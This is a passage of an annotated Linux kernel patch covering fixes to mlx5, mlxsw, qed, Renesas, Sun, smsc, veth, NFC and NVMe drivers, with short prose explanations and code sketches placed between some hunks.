+ 	mutex_lock(&esw->fdb_table.offloads.indir->lock);
+-	e = mlx5_esw_indir_table_entry_lookup(esw, vport, attr->ip_version);
++	e = mlx5_esw_indir_table_entry_lookup(esw, vport);
+ 	if (e) {
+ 		if (!decap) {
+ 			e->fwd_ref++;
+ 		} else {
+-			err = mlx5_esw_indir_table_rule_get(esw, attr, spec, e);
++			err = mlx5_esw_indir_table_rule_get(esw, attr, e);
+ 			if (err)
+ 				goto out_err;
+ 		}
+ 	} else {
+-		e = mlx5_esw_indir_table_entry_create(esw, attr, spec, vport, decap);
++		e = mlx5_esw_indir_table_entry_create(esw, attr, vport, decap);
+ 		if (IS_ERR(e)) {
+ 			err = PTR_ERR(e);
+ 			esw_warn(esw->dev, "Failed to create indirection table, err %d.\n", err);
+@@ -494,22 +362,21 @@ out_err:
+ }
+ 
+ void mlx5_esw_indir_table_put(struct mlx5_eswitch *esw,
+-			      struct mlx5_flow_attr *attr,
+ 			      u16 vport, bool decap)
+ {
+ 	struct mlx5_esw_indir_table_entry *e;
+ 
+ 	mutex_lock(&esw->fdb_table.offloads.indir->lock);
+-	e = mlx5_esw_indir_table_entry_lookup(esw, vport, attr->ip_version);
++	e = mlx5_esw_indir_table_entry_lookup(esw, vport);
+ 	if (!e)
+ 		goto out;
+ 
+ 	if (!decap)
+ 		e->fwd_ref--;
+ 	else
+-		mlx5_esw_indir_table_rule_put(esw, attr, e);
++		mlx5_esw_indir_table_rule_put(esw, e);
+ 
+-	if (e->fwd_ref || e->recirc_cnt)
++	if (e->fwd_ref || e->recirc_rule)
+ 		goto out;
+ 
+ 	hash_del(&e->hlist);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.h b/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.h
+index 21d56b49d14bc..036f5b3a341b9 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/esw/indir_table.h
+@@ -13,10 +13,8 @@ mlx5_esw_indir_table_destroy(struct mlx5_esw_indir_table *indir);
+ 
+ struct mlx5_flow_table *mlx5_esw_indir_table_get(struct mlx5_eswitch *esw,
+ 						 struct mlx5_flow_attr *attr,
+-						 struct mlx5_flow_spec *spec,
+ 						 u16 vport, bool decap);
+ void mlx5_esw_indir_table_put(struct mlx5_eswitch *esw,
+-			      struct mlx5_flow_attr *attr,
+ 			      u16 vport, bool decap);
+ 
+ bool
+@@ -44,7 +42,6 @@ mlx5_esw_indir_table_destroy(struct mlx5_esw_indir_table *indir)
+ static inline struct mlx5_flow_table *
+ mlx5_esw_indir_table_get(struct mlx5_eswitch *esw,
+ 			 struct mlx5_flow_attr *attr,
+-			 struct mlx5_flow_spec *spec,
+ 			 u16 vport, bool decap)
+ {
+ 	return ERR_PTR(-EOPNOTSUPP);
+@@ -52,7 +49,6 @@ mlx5_esw_indir_table_get(struct mlx5_eswitch *esw,
+ 
+ static inline void
+ mlx5_esw_indir_table_put(struct mlx5_eswitch *esw,
+-			 struct mlx5_flow_attr *attr,
+ 			 u16 vport, bool decap)
+ {
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+index 235f6f0a70523..34790a82a0976 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/eswitch_offloads.c
+@@ -178,15 +178,14 @@ mlx5_eswitch_set_rule_source_port(struct mlx5_eswitch *esw,
+ 
+ static int
+ esw_setup_decap_indir(struct mlx5_eswitch *esw,
+-		      struct mlx5_flow_attr *attr,
+-		      struct mlx5_flow_spec *spec)
++		      struct mlx5_flow_attr *attr)
+ {
+ 	struct mlx5_flow_table *ft;
+ 
+ 	if (!(attr->flags & MLX5_ATTR_FLAG_SRC_REWRITE))
+ 		return -EOPNOTSUPP;
+ 
+-	ft = mlx5_esw_indir_table_get(esw, attr, spec,
++	ft = mlx5_esw_indir_table_get(esw, attr,
+ 				      mlx5_esw_indir_table_decap_vport(attr), true);
+ 	return PTR_ERR_OR_ZERO(ft);
+ }
+@@ -196,7 +195,7 @@ esw_cleanup_decap_indir(struct mlx5_eswitch *esw,
+ 			struct mlx5_flow_attr *attr)
+ {
+ 	if (mlx5_esw_indir_table_decap_vport(attr))
+-		mlx5_esw_indir_table_put(esw, attr,
++		mlx5_esw_indir_table_put(esw,
+ 					 mlx5_esw_indir_table_decap_vport(attr),
+ 					 true);
+ }
+@@ -219,7 +218,6 @@ esw_setup_ft_dest(struct mlx5_flow_destination *dest,
+ 		  struct mlx5_flow_act *flow_act,
+ 		  struct mlx5_eswitch *esw,
+ 		  struct mlx5_flow_attr *attr,
+-		  struct mlx5_flow_spec *spec,
+ 		  int i)
+ {
+ 	flow_act->flags |= FLOW_ACT_IGNORE_FLOW_LEVEL;
+@@ -227,7 +225,7 @@ esw_setup_ft_dest(struct mlx5_flow_destination *dest,
+ 	dest[i].ft = attr->dest_ft;
+ 
+ 	if (mlx5_esw_indir_table_decap_vport(attr))
+-		return esw_setup_decap_indir(esw, attr, spec);
++		return esw_setup_decap_indir(esw, attr);
+ 	return 0;
+ }
+ 
+@@ -282,7 +280,7 @@ static void esw_put_dest_tables_loop(struct mlx5_eswitch *esw, struct mlx5_flow_
+ 			mlx5_chains_put_table(chains, 0, 1, 0);
+ 		else if (mlx5_esw_indir_table_needed(esw, attr, esw_attr->dests[i].rep->vport,
+ 						     esw_attr->dests[i].mdev))
+-			mlx5_esw_indir_table_put(esw, attr, esw_attr->dests[i].rep->vport,
++			mlx5_esw_indir_table_put(esw, esw_attr->dests[i].rep->vport,
+ 						 false);
+ }
+ 
+@@ -368,7 +366,6 @@ esw_setup_indir_table(struct mlx5_flow_destination *dest,
+ 		      struct mlx5_flow_act *flow_act,
+ 		      struct mlx5_eswitch *esw,
+ 		      struct mlx5_flow_attr *attr,
+-		      struct mlx5_flow_spec *spec,
+ 		      bool ignore_flow_lvl,
+ 		      int *i)
+ {
+@@ -383,7 +380,7 @@ esw_setup_indir_table(struct mlx5_flow_destination *dest,
+ 			flow_act->flags |= FLOW_ACT_IGNORE_FLOW_LEVEL;
+ 		dest[*i].type = MLX5_FLOW_DESTINATION_TYPE_FLOW_TABLE;
+ 
+-		dest[*i].ft = mlx5_esw_indir_table_get(esw, attr, spec,
++		dest[*i].ft = mlx5_esw_indir_table_get(esw, attr,
+ 						       esw_attr->dests[j].rep->vport, false);
+ 		if (IS_ERR(dest[*i].ft)) {
+ 			err = PTR_ERR(dest[*i].ft);
+@@ -392,7 +389,7 @@ esw_setup_indir_table(struct mlx5_flow_destination *dest,
+ 	}
+ 
+ 	if (mlx5_esw_indir_table_decap_vport(attr)) {
+-		err = esw_setup_decap_indir(esw, attr, spec);
++		err = esw_setup_decap_indir(esw, attr);
+ 		if (err)
+ 			goto err_indir_tbl_get;
+ 	}
+@@ -490,14 +487,14 @@ esw_setup_dests(struct mlx5_flow_destination *dest,
+ 		esw_setup_accept_dest(dest, flow_act, chains, *i);
+ 		(*i)++;
+ 	} else if (esw_is_indir_table(esw, attr)) {
+-		err = esw_setup_indir_table(dest, flow_act, esw, attr, spec, true, i);
++		err = esw_setup_indir_table(dest, flow_act, esw, attr, true, i);
+ 	} else if (esw_is_chain_src_port_rewrite(esw, esw_attr)) {
+ 		err = esw_setup_chain_src_port_rewrite(dest, flow_act, esw, chains, attr, i);
+ 	} else {
+ 		*i = esw_setup_vport_dests(dest, flow_act, esw, esw_attr, *i);
+ 
+ 		if (attr->dest_ft) {
+-			err = esw_setup_ft_dest(dest, flow_act, esw, attr, spec, *i);
++			err = esw_setup_ft_dest(dest, flow_act, esw, attr, *i);
+ 			(*i)++;
+ 		} else if (attr->dest_chain) {
+ 			err = esw_setup_chain_dest(dest, flow_act, chains, attr->dest_chain,
+@@ -699,11 +696,11 @@ mlx5_eswitch_add_fwd_rule(struct mlx5_eswitch *esw,
+ 
+ 	flow_act.action = MLX5_FLOW_CONTEXT_ACTION_FWD_DEST;
+ 	for (i = 0; i < esw_attr->split_count; i++) {
+-		if (esw_is_indir_table(esw, attr))
+-			err = esw_setup_indir_table(dest, &flow_act, esw, attr, spec, false, &i);
+-		else if (esw_is_chain_src_port_rewrite(esw, esw_attr))
+-			err = esw_setup_chain_src_port_rewrite(dest, &flow_act, esw, chains, attr,
+-							       &i);
++		if (esw_attr->dests[i].flags & MLX5_ESW_DEST_CHAIN_WITH_SRC_PORT_CHANGE)
++			/* Source port rewrite (forward to an ovs internal port or a
++			 * stack device) isn't supported in the rule of a split action.
++			 */
++			err = -EOPNOTSUPP;
+ 		else
+ 			esw_setup_vport_dest(dest, &flow_act, esw, esw_attr, i, i, false);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+index 038ae0fcf9d45..aed4e896179a3 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/ipoib/ipoib.c
+@@ -70,7 +70,6 @@ static void mlx5i_build_nic_params(struct mlx5_core_dev *mdev,
+ 
+ 	params->packet_merge.type = MLX5E_PACKET_MERGE_NONE;
+ 	params->hard_mtu = MLX5_IB_GRH_BYTES + MLX5_IPOIB_HARD_LEN;
+-	params->tunneled_offload_en = false;
+ 
+ 	/* CQE compression is not supported for IPoIB */
+ 	params->rx_cqe_compress_def = false;
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index f07175549a87d..59914f66857da 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1339,8 +1339,8 @@ err_irq_table:
+ static void mlx5_unload(struct mlx5_core_dev *dev)
+ {
+ 	mlx5_sf_dev_table_destroy(dev);
+-	mlx5_sriov_detach(dev);
+ 	mlx5_eswitch_disable(dev->priv.eswitch);
++	mlx5_sriov_detach(dev);
+ 	mlx5_lag_remove_mdev(dev);
+ 	mlx5_ec_cleanup(dev);
+ 	mlx5_sf_hw_table_destroy(dev);
+@@ -1752,11 +1752,11 @@ static void remove_one(struct pci_dev *pdev)
+ 	struct mlx5_core_dev *dev  = pci_get_drvdata(pdev);
+ 	struct devlink *devlink = priv_to_devlink(dev);
+ 
++	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	/* mlx5_drain_fw_reset() is using devlink APIs. Hence, we must drain
+ 	 * fw_reset before unregistering the devlink.
+ 	 */
+ 	mlx5_drain_fw_reset(dev);
+-	set_bit(MLX5_BREAK_FW_WAIT, &dev->intf_state);
+ 	devlink_unregister(devlink);
+ 	mlx5_sriov_disable(pdev);
+ 	mlx5_crdump_disable(dev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+index 64d4e7125e9bb..95dc67fb30015 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pagealloc.c
+@@ -82,6 +82,16 @@ static u16 func_id_to_type(struct mlx5_core_dev *dev, u16 func_id, bool ec_funct
+ 	return func_id <= mlx5_core_max_vfs(dev) ?  MLX5_VF : MLX5_SF;
+ }
+ 
++static u32 mlx5_get_ec_function(u32 function)
++{
++	return function >> 16;
++}
++
++static u32 mlx5_get_func_id(u32 function)
++{
++	return function & 0xffff;
++}
++
+ static struct rb_root *page_root_per_function(struct mlx5_core_dev *dev, u32 function)
+ {
+ 	struct rb_root *root;
+@@ -665,20 +675,22 @@ static int optimal_reclaimed_pages(void)
+ }
+ 
+ static int mlx5_reclaim_root_pages(struct mlx5_core_dev *dev,
+-				   struct rb_root *root, u16 func_id)
++				   struct rb_root *root, u32 function)
+ {
+ 	u64 recl_pages_to_jiffies = msecs_to_jiffies(mlx5_tout_ms(dev, RECLAIM_PAGES));
+ 	unsigned long end = jiffies + recl_pages_to_jiffies;
+ 
+ 	while (!RB_EMPTY_ROOT(root)) {
++		u32 ec_function = mlx5_get_ec_function(function);
++		u32 function_id = mlx5_get_func_id(function);
+ 		int nclaimed;
+ 		int err;
+ 
+-		err = reclaim_pages(dev, func_id, optimal_reclaimed_pages(),
+-				    &nclaimed, false, mlx5_core_is_ecpf(dev));
++		err = reclaim_pages(dev, function_id, optimal_reclaimed_pages(),
++				    &nclaimed, false, ec_function);
+ 		if (err) {
+-			mlx5_core_warn(dev, "failed reclaiming pages (%d) for func id 0x%x\n",
+-				       err, func_id);
++			mlx5_core_warn(dev, "reclaim_pages err (%d) func_id=0x%x ec_func=0x%x\n",
++				       err, function_id, ec_function);
+ 			return err;
+ 		}
+ 
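
The reclaim path now carries a single u32 "function" that packs the EC-function
flag in the upper 16 bits and the function id in the lower 16, matching the two
accessors added at the top of pagealloc.c. A sketch of the encode side those
accessors imply; this encoder is hypothetical, the real producer lives elsewhere
in the file:

    /* Sketch: hypothetical counterpart to mlx5_get_ec_function() and
     * mlx5_get_func_id() from the hunk above.
     */
    static u32 mlx5_pack_function(u16 func_id, bool ec_function)
    {
    	return ((u32)ec_function << 16) | func_id;
    }
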
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
+index 5bcf5bceff710..67ecdb9e708f9 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum.c
+@@ -2931,6 +2931,7 @@ static int mlxsw_sp_netdevice_event(struct notifier_block *unused,
+ 
+ static void mlxsw_sp_parsing_init(struct mlxsw_sp *mlxsw_sp)
+ {
++	refcount_set(&mlxsw_sp->parsing.parsing_depth_ref, 0);
+ 	mlxsw_sp->parsing.parsing_depth = MLXSW_SP_DEFAULT_PARSING_DEPTH;
+ 	mlxsw_sp->parsing.vxlan_udp_dport = MLXSW_SP_DEFAULT_VXLAN_UDP_DPORT;
+ 	mutex_init(&mlxsw_sp->parsing.lock);
+@@ -2939,6 +2940,7 @@ static void mlxsw_sp_parsing_init(struct mlxsw_sp *mlxsw_sp)
+ static void mlxsw_sp_parsing_fini(struct mlxsw_sp *mlxsw_sp)
+ {
+ 	mutex_destroy(&mlxsw_sp->parsing.lock);
++	WARN_ON_ONCE(refcount_read(&mlxsw_sp->parsing.parsing_depth_ref));
+ }
+ 
+ struct mlxsw_sp_ipv6_addr_node {
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
+index 48f1fa62a4fd4..ab0aa1a61d4aa 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/spectrum_router.c
+@@ -10313,11 +10313,23 @@ err_reg_write:
+ 					      old_inc_parsing_depth);
+ 	return err;
+ }
++
++static void mlxsw_sp_mp_hash_fini(struct mlxsw_sp *mlxsw_sp)
++{
++	bool old_inc_parsing_depth = mlxsw_sp->router->inc_parsing_depth;
++
++	mlxsw_sp_mp_hash_parsing_depth_adjust(mlxsw_sp, old_inc_parsing_depth,
++					      false);
++}
+ #else
+ static int mlxsw_sp_mp_hash_init(struct mlxsw_sp *mlxsw_sp)
+ {
+ 	return 0;
+ }
++
++static void mlxsw_sp_mp_hash_fini(struct mlxsw_sp *mlxsw_sp)
++{
++}
+ #endif
+ 
+ static int mlxsw_sp_dscp_init(struct mlxsw_sp *mlxsw_sp)
+@@ -10547,6 +10559,7 @@ err_register_inet6addr_notifier:
+ err_register_inetaddr_notifier:
+ 	mlxsw_core_flush_owq();
+ err_dscp_init:
++	mlxsw_sp_mp_hash_fini(mlxsw_sp);
+ err_mp_hash_init:
+ 	mlxsw_sp_neigh_fini(mlxsw_sp);
+ err_neigh_init:
+@@ -10587,6 +10600,7 @@ void mlxsw_sp_router_fini(struct mlxsw_sp *mlxsw_sp)
+ 	unregister_inet6addr_notifier(&mlxsw_sp->router->inet6addr_nb);
+ 	unregister_inetaddr_notifier(&mlxsw_sp->router->inetaddr_nb);
+ 	mlxsw_core_flush_owq();
++	mlxsw_sp_mp_hash_fini(mlxsw_sp);
+ 	mlxsw_sp_neigh_fini(mlxsw_sp);
+ 	mlxsw_sp_lb_rif_fini(mlxsw_sp);
+ 	mlxsw_sp_vrs_fini(mlxsw_sp);
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_dev.c b/drivers/net/ethernet/qlogic/qed/qed_dev.c
+index d61cd32ec3b65..86a93cac26470 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_dev.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_dev.c
+@@ -5083,6 +5083,11 @@ static int qed_init_wfq_param(struct qed_hwfn *p_hwfn,
+ 
+ 	num_vports = p_hwfn->qm_info.num_vports;
+ 
++	if (num_vports < 2) {
++		DP_NOTICE(p_hwfn, "Unexpected num_vports: %d\n", num_vports);
++		return -EINVAL;
++	}
++
+ 	/* Accounting for the vports which are configured for WFQ explicitly */
+ 	for (i = 0; i < num_vports; i++) {
+ 		u32 tmp_speed;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c b/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
+index 6190adf965bca..f55eed092f25d 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_mng_tlv.c
+@@ -422,7 +422,7 @@ qed_mfw_get_tlv_time_value(struct qed_mfw_tlv_time *p_time,
+ 	if (p_time->hour > 23)
+ 		p_time->hour = 0;
+ 	if (p_time->min > 59)
+-		p_time->hour = 0;
++		p_time->min = 0;
+ 	if (p_time->msec > 999)
+ 		p_time->msec = 0;
+ 	if (p_time->usec > 999)
+diff --git a/drivers/net/ethernet/renesas/ravb_main.c b/drivers/net/ethernet/renesas/ravb_main.c
+index 0f54849a38235..894e2690c6437 100644
+--- a/drivers/net/ethernet/renesas/ravb_main.c
++++ b/drivers/net/ethernet/renesas/ravb_main.c
+@@ -1455,8 +1455,6 @@ static int ravb_phy_init(struct net_device *ndev)
+ 		phy_remove_link_mode(phydev, ETHTOOL_LINK_MODE_100baseT_Half_BIT);
+ 	}
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	return 0;
+@@ -2379,6 +2377,8 @@ static int ravb_mdio_init(struct ravb_private *priv)
+ {
+ 	struct platform_device *pdev = priv->pdev;
+ 	struct device *dev = &pdev->dev;
++	struct phy_device *phydev;
++	struct device_node *pn;
+ 	int error;
+ 
+ 	/* Bitbang init */
+@@ -2400,6 +2400,14 @@ static int ravb_mdio_init(struct ravb_private *priv)
+ 	if (error)
+ 		goto out_free_bus;
+ 
++	pn = of_parse_phandle(dev->of_node, "phy-handle", 0);
++	phydev = of_phy_find_device(pn);
++	if (phydev) {
++		phydev->mac_managed_pm = true;
++		put_device(&phydev->mdio.dev);
++	}
++	of_node_put(pn);
++
+ 	return 0;
+ 
+ out_free_bus:
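
Setting phydev->mac_managed_pm at MDIO-init time, rather than in the PHY-init
path that only runs on open, ensures the flag is in place before the first
suspend/resume cycle; the sh_eth hunk below applies the same pattern. A sketch
of the lookup, assuming a device-tree "phy-handle" reference:

    #include <linux/of_mdio.h>
    #include <linux/phy.h>

    /* Sketch: mark the PHY as MAC-managed for PM right after the MDIO
     * bus registers, dropping the reference of_phy_find_device() took.
     */
    static void mark_phy_mac_managed(struct device_node *np)
    {
    	struct device_node *pn = of_parse_phandle(np, "phy-handle", 0);
    	struct phy_device *phydev = of_phy_find_device(pn);

    	if (phydev) {
    		phydev->mac_managed_pm = true;
    		put_device(&phydev->mdio.dev);
    	}
    	of_node_put(pn);
    }
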
+diff --git a/drivers/net/ethernet/renesas/sh_eth.c b/drivers/net/ethernet/renesas/sh_eth.c
+index 71a4991133080..14dc5833c465c 100644
+--- a/drivers/net/ethernet/renesas/sh_eth.c
++++ b/drivers/net/ethernet/renesas/sh_eth.c
+@@ -2029,8 +2029,6 @@ static int sh_eth_phy_init(struct net_device *ndev)
+ 	if (mdp->cd->register_type != SH_ETH_REG_GIGABIT)
+ 		phy_set_max_speed(phydev, SPEED_100);
+ 
+-	/* Indicate that the MAC is responsible for managing PHY PM */
+-	phydev->mac_managed_pm = true;
+ 	phy_attached_info(phydev);
+ 
+ 	return 0;
+@@ -3074,6 +3072,8 @@ static int sh_mdio_init(struct sh_eth_private *mdp,
+ 	struct bb_info *bitbang;
+ 	struct platform_device *pdev = mdp->pdev;
+ 	struct device *dev = &mdp->pdev->dev;
++	struct phy_device *phydev;
++	struct device_node *pn;
+ 
+ 	/* create bit control struct for PHY */
+ 	bitbang = devm_kzalloc(dev, sizeof(struct bb_info), GFP_KERNEL);
+@@ -3108,6 +3108,14 @@ static int sh_mdio_init(struct sh_eth_private *mdp,
+ 	if (ret)
+ 		goto out_free_bus;
+ 
++	pn = of_parse_phandle(dev->of_node, "phy-handle", 0);
++	phydev = of_phy_find_device(pn);
++	if (phydev) {
++		phydev->mac_managed_pm = true;
++		put_device(&phydev->mdio.dev);
++	}
++	of_node_put(pn);
++
+ 	return 0;
+ 
+ out_free_bus:
+diff --git a/drivers/net/ethernet/sun/ldmvsw.c b/drivers/net/ethernet/sun/ldmvsw.c
+index 8addee6d04bd8..734a817d3c945 100644
+--- a/drivers/net/ethernet/sun/ldmvsw.c
++++ b/drivers/net/ethernet/sun/ldmvsw.c
+@@ -287,6 +287,9 @@ static int vsw_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 
+ 	hp = mdesc_grab();
+ 
++	if (!hp)
++		return -ENODEV;
++
+ 	rmac = mdesc_get_property(hp, vdev->mp, remote_macaddr_prop, &len);
+ 	err = -ENODEV;
+ 	if (!rmac) {
+diff --git a/drivers/net/ethernet/sun/sunvnet.c b/drivers/net/ethernet/sun/sunvnet.c
+index acda6cbd0238d..bdf4c8be2d536 100644
+--- a/drivers/net/ethernet/sun/sunvnet.c
++++ b/drivers/net/ethernet/sun/sunvnet.c
+@@ -433,6 +433,9 @@ static int vnet_port_probe(struct vio_dev *vdev, const struct vio_device_id *id)
+ 
+ 	hp = mdesc_grab();
+ 
++	if (!hp)
++		return -ENODEV;
++
+ 	vp = vnet_find_parent(hp, vdev->mp, vdev);
+ 	if (IS_ERR(vp)) {
+ 		pr_err("Cannot find port parent vnet\n");
+diff --git a/drivers/net/ipvlan/ipvlan_l3s.c b/drivers/net/ipvlan/ipvlan_l3s.c
+index 943d26cbf39f5..71712ea25403d 100644
+--- a/drivers/net/ipvlan/ipvlan_l3s.c
++++ b/drivers/net/ipvlan/ipvlan_l3s.c
+@@ -101,6 +101,7 @@ static unsigned int ipvlan_nf_input(void *priv, struct sk_buff *skb,
+ 		goto out;
+ 
+ 	skb->dev = addr->master->dev;
++	skb->skb_iif = skb->dev->ifindex;
+ 	len = skb->len + ETH_HLEN;
+ 	ipvlan_count_rx(addr->master, len, true, false);
+ out:
+diff --git a/drivers/net/phy/nxp-c45-tja11xx.c b/drivers/net/phy/nxp-c45-tja11xx.c
+index 047c581457e34..5813b07242ce1 100644
+--- a/drivers/net/phy/nxp-c45-tja11xx.c
++++ b/drivers/net/phy/nxp-c45-tja11xx.c
+@@ -79,7 +79,7 @@
+ #define SGMII_ABILITY			BIT(0)
+ 
+ #define VEND1_MII_BASIC_CONFIG		0xAFC6
+-#define MII_BASIC_CONFIG_REV		BIT(8)
++#define MII_BASIC_CONFIG_REV		BIT(4)
+ #define MII_BASIC_CONFIG_SGMII		0x9
+ #define MII_BASIC_CONFIG_RGMII		0x7
+ #define MII_BASIC_CONFIG_RMII		0x5
+diff --git a/drivers/net/phy/smsc.c b/drivers/net/phy/smsc.c
+index 00d9eff91dcfa..df2c5435c5c49 100644
+--- a/drivers/net/phy/smsc.c
++++ b/drivers/net/phy/smsc.c
+@@ -199,8 +199,11 @@ static int lan95xx_config_aneg_ext(struct phy_device *phydev)
+ static int lan87xx_read_status(struct phy_device *phydev)
+ {
+ 	struct smsc_phy_priv *priv = phydev->priv;
++	int err;
+ 
+-	int err = genphy_read_status(phydev);
++	err = genphy_read_status(phydev);
++	if (err)
++		return err;
+ 
+ 	if (!phydev->link && priv->energy_enable && phydev->irq == PHY_POLL) {
+ 		/* Disable EDPD to wake up PHY */
+diff --git a/drivers/net/usb/smsc75xx.c b/drivers/net/usb/smsc75xx.c
+index 95de452ff4dad..5d6454fedb3f1 100644
+--- a/drivers/net/usb/smsc75xx.c
++++ b/drivers/net/usb/smsc75xx.c
+@@ -2200,6 +2200,13 @@ static int smsc75xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 		size = (rx_cmd_a & RX_CMD_A_LEN) - RXW_PADDING;
+ 		align_count = (4 - ((size + RXW_PADDING) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err rx_cmd_a=0x%08x\n",
++				  rx_cmd_a);
++			return 0;
++		}
++
+ 		if (unlikely(rx_cmd_a & RX_CMD_A_RED)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error rx_cmd_a=0x%08x\n", rx_cmd_a);
+diff --git a/drivers/net/veth.c b/drivers/net/veth.c
+index bd385ccd0d18d..a71786b3e7ba7 100644
+--- a/drivers/net/veth.c
++++ b/drivers/net/veth.c
+@@ -701,7 +701,8 @@ static int veth_convert_skb_to_xdp_buff(struct veth_rq *rq,
+ 	u32 frame_sz;
+ 
+ 	if (skb_shared(skb) || skb_head_is_locked(skb) ||
+-	    skb_shinfo(skb)->nr_frags) {
++	    skb_shinfo(skb)->nr_frags ||
++	    skb_headroom(skb) < XDP_PACKET_HEADROOM) {
+ 		u32 size, len, max_head_size, off;
+ 		struct sk_buff *nskb;
+ 		struct page *page;
+@@ -766,9 +767,6 @@ static int veth_convert_skb_to_xdp_buff(struct veth_rq *rq,
+ 
+ 		consume_skb(skb);
+ 		skb = nskb;
+-	} else if (skb_headroom(skb) < XDP_PACKET_HEADROOM &&
+-		   pskb_expand_head(skb, VETH_XDP_HEADROOM, 0, GFP_ATOMIC)) {
+-		goto drop;
+ 	}
+ 
+ 	/* SKB "head" area always have tailroom for skb_shared_info */
+diff --git a/drivers/nfc/pn533/usb.c b/drivers/nfc/pn533/usb.c
+index ed9c5e2cf3ad4..a187f0e0b0f7d 100644
+--- a/drivers/nfc/pn533/usb.c
++++ b/drivers/nfc/pn533/usb.c
+@@ -175,6 +175,7 @@ static int pn533_usb_send_frame(struct pn533 *dev,
+ 	print_hex_dump_debug("PN533 TX: ", DUMP_PREFIX_NONE, 16, 1,
+ 			     out->data, out->len, false);
+ 
++	arg.phy = phy;
+ 	init_completion(&arg.done);
+ 	cntx = phy->out_urb->context;
+ 	phy->out_urb->context = &arg;
+diff --git a/drivers/nfc/st-nci/ndlc.c b/drivers/nfc/st-nci/ndlc.c
+index 755460a73c0dc..d2aa9f766738e 100644
+--- a/drivers/nfc/st-nci/ndlc.c
++++ b/drivers/nfc/st-nci/ndlc.c
+@@ -282,13 +282,15 @@ EXPORT_SYMBOL(ndlc_probe);
+ 
+ void ndlc_remove(struct llt_ndlc *ndlc)
+ {
+-	st_nci_remove(ndlc->ndev);
+-
+ 	/* cancel timers */
+ 	del_timer_sync(&ndlc->t1_timer);
+ 	del_timer_sync(&ndlc->t2_timer);
+ 	ndlc->t2_active = false;
+ 	ndlc->t1_active = false;
++	/* cancel work */
++	cancel_work_sync(&ndlc->sm_work);
++
++	st_nci_remove(ndlc->ndev);
+ 
+ 	skb_queue_purge(&ndlc->rcv_q);
+ 	skb_queue_purge(&ndlc->send_q);
+diff --git a/drivers/nvme/host/core.c b/drivers/nvme/host/core.c
+index 2031fd960549c..a95e48b51da66 100644
+--- a/drivers/nvme/host/core.c
++++ b/drivers/nvme/host/core.c
+@@ -779,16 +779,26 @@ static blk_status_t nvme_setup_discard(struct nvme_ns *ns, struct request *req,
+ 		range = page_address(ns->ctrl->discard_page);
+ 	}
+ 
+-	__rq_for_each_bio(bio, req) {
+-		u64 slba = nvme_sect_to_lba(ns, bio->bi_iter.bi_sector);
+-		u32 nlb = bio->bi_iter.bi_size >> ns->lba_shift;
+-
+-		if (n < segments) {
+-			range[n].cattr = cpu_to_le32(0);
+-			range[n].nlb = cpu_to_le32(nlb);
+-			range[n].slba = cpu_to_le64(slba);
++	if (queue_max_discard_segments(req->q) == 1) {
++		u64 slba = nvme_sect_to_lba(ns, blk_rq_pos(req));
++		u32 nlb = blk_rq_sectors(req) >> (ns->lba_shift - 9);
++
++		range[0].cattr = cpu_to_le32(0);
++		range[0].nlb = cpu_to_le32(nlb);
++		range[0].slba = cpu_to_le64(slba);
++		n = 1;
++	} else {
++		__rq_for_each_bio(bio, req) {
++			u64 slba = nvme_sect_to_lba(ns, bio->bi_iter.bi_sector);
++			u32 nlb = bio->bi_iter.bi_size >> ns->lba_shift;
++
++			if (n < segments) {
++				range[n].cattr = cpu_to_le32(0);
++				range[n].nlb = cpu_to_le32(nlb);
++				range[n].slba = cpu_to_le64(slba);
++			}
++			n++;
+ 		}
+-		n++;
+ 	}
+ 
+ 	if (WARN_ON_ONCE(n != segments)) {
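
When the queue advertises a single discard segment, a merged discard request can
carry more bios than the one range the device accepts, so the new branch
collapses the whole request into a single LBA range via blk_rq_pos() and
blk_rq_sectors(). A sketch of the sector-to-LBA arithmetic, using the same shift
convention as the hunk:

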